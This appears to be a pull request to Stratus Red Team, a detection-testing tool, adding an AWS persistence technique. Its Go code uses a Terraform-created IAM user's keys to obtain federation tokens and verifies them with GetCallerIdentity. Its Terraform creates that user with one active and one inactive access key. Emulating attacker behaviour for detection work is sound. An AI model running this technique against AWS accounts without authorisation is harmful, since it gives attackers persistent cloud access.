+		return errors.New("Error getting federation token: " + err.Error())
+	}
+
+	log.Println("Successfully obtained federated credentials for user:", federatedUserName)
+
+	tempCredentialsProvider := aws.NewCredentialsCache(
+		credentials.NewStaticCredentialsProvider(
+			*federationTokenResult.Credentials.AccessKeyId,
+			*federationTokenResult.Credentials.SecretAccessKey,
+			*federationTokenResult.Credentials.SessionToken,
+		),
+	)
+	federatedConfig := awsConfig.Copy()
+	federatedConfig.Credentials = tempCredentialsProvider
+
+	federatedStsClient := sts.NewFromConfig(federatedConfig)
+
+	log.Println("Calling STS with federated credentials to get the current user identity")
+	federatedCallerIdentity, err := federatedStsClient.GetCallerIdentity(context.Background(), &sts.GetCallerIdentityInput{})
+	if err != nil {
+		return errors.New("Error getting caller identity with federated credentials: " + err.Error())
+	}
+	log.Println("Federated user identity:", *federatedCallerIdentity.Arn)
+
+	return nil
+}

--- a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
+++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
@@ -28,12 +28,12 @@ resource "aws_iam_user" "legit-user" {
 
 data "aws_iam_policy_document" "legit-user-policy-document" {
   statement {
-    effect    = "Allow"
-    actions   = [
+    effect = "Allow"
+    actions = [
       "sts:GetFederationToken",
       "iam:UpdateAccessKey",
       "iam:ListAccessKeys"
-      ]
+    ]
     resources = ["*"]
   }
 }
@@ -45,13 +45,13 @@ resource "aws_iam_user_policy" "legit-user-policy" {
 }
 
 resource "aws_iam_access_key" "inactive-credentials" {
-  user    = aws_iam_user.legit-user.name
-  status  = "Inactive"
+  user   = aws_iam_user.legit-user.name
+  status = "Inactive"
 }
 
 resource "aws_iam_access_key" "active-credentials" {
-  user    = aws_iam_user.legit-user.name
-  status  = "Active"
+  user   = aws_iam_user.legit-user.name
+  status = "Active"
 }
 
 output "user_name" {
@@ -63,7 +63,7 @@ output "access_key_id" {
 }
 
 output "secret_access_key" {
-  value = aws_iam_access_key.active-credentials.secret
+  value     = aws_iam_access_key.active-credentials.secret
   sensitive = true
 }
 
@@ -72,5 +72,5 @@ output "display" {
 }
 
 output "access_key_create_date" {
-    value = aws_iam_access_key.active-credentials.create_date
+  value = aws_iam_access_key.active-credentials.create_date
 }

--- a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
+++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
@@ -1,0 +1,72 @@
+terraform {
+  required_providers {
+    aws = {
+      source  = "hashicorp/aws"
+      version = "~> 3.0"
+    }
+  }
+}
+provider "aws" {
+  skip_region_validation      = true
+  skip_credentials_validation = true
+  skip_get_ec2_platforms      = true
+  default_tags {
+    tags = {
+      StratusRedTeam = true
+    }
+  }
+}
+
+locals {
+  resource_prefix = "stratus-red-team-user-federation"
+}
+
+resource "aws_iam_user" "legit-user" {
+  name          = "${local.resource_prefix}-user"
+  force_destroy = true
+}
+
+data "aws_iam_policy_document" "legit-user-policy-document" {
+  statement {
+    effect    = "Allow"
+    actions   = [
+      "sts:GetFederationToken",
+      "iam:UpdateAccessKey",
+      "iam:ListAccessKeys"
+      ]
+    resources = ["*"]
+  }
+}
+
+resource "aws_iam_user_policy" "legit-user-policy" {
+  name   = "test"
+  user   = aws_iam_user.legit-user.name
+  policy = data.aws_iam_policy_document.legit-user-policy-document.json
+}
+
+resource "aws_iam_access_key" "inactive-credentials" {
+  user    = aws_iam_user.legit-user.name
+  status  = "Inactive"
+}
+
+resource "aws_iam_access_key" "active-credentials" {
+  user    = aws_iam_user.legit-user.name
+  status  = "Active"
+}
+
+output "user_name" {
+  value = aws_iam_user.legit-user.name
+}
+
+output "access_key_id" {
+  value = aws_iam_access_key.active-credentials.id
+}
+
+output "secret_access_key" {
+  value = aws_iam_access_key.active-credentials.secret
+  sensitive = true
+}
+
+output "display" {
+  value = format("IAM user %s ready", aws_iam_user.legit-user.name)
+}

--- a/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
+++ b/v2/internal/attacktechniques/aws/persistence/sts-federation-token/main.tf
@@ -70,3 +70,7 @@ output "secret_access_key" {
 output "display" {
   value = format("IAM user %s ready", aws_iam_user.legit-user.name)
 }
+
+output "access_key_create_date" {
+    value = aws_iam_access_key.active-credentials.create_date
+}

--- a/v2/internal/attacktechniques/main.go
+++ b/v2/internal/attacktechniques/main.go
@@ -40,6 +40,7 @@ import (
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-backdoor-function"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-layer-extension"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/lambda-overwrite-code"
+	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/sts-federation-token"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/persistence/rolesanywhere-create-trust-anchor"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/aws/privilege-escalation/change-iam-user-password"
 	_ "github.com/datadog/stratus-red-team/v2/internal/attacktechniques/azure/execution/vm-custom-script-extension"


### PR DESCRIPTION
### What does this PR do?

* New attack technique

### Motivation

I saw that this was an open and prioritized issue: https://github.com/DataDog/stratus-red-team/issues/313

The current implementation creates an IAM user and a pair of access keys, one enabled and the other disabled. I use the enabled credentials to call the GetFederationToken API. This is not done directly from the credentials used in the Stratus Red Team session because GetFederationToken generates temporary security credentials for a user. If you're using a role to execute Stratus Red Team, this approach likely won't work. Instead, using the credentials of the IAM user created during the warmup phase allows us to successfully reproduce the GetFederationToken step.

Afterward, I only call the sts:GetCallerIdentity API to verify that the session works. I am not re-enabling the disabled access keys, as this requires interaction with the AWS Management Console.

### Checklist

- [x] The attack technique emulates a single attack step, not a full attack chain
- [x] We have factual evidence & references that the attack technique was used by real malware, pentesters, or attackers
- [x] The attack technique makes no assumption about the state of the environment prior to warming it up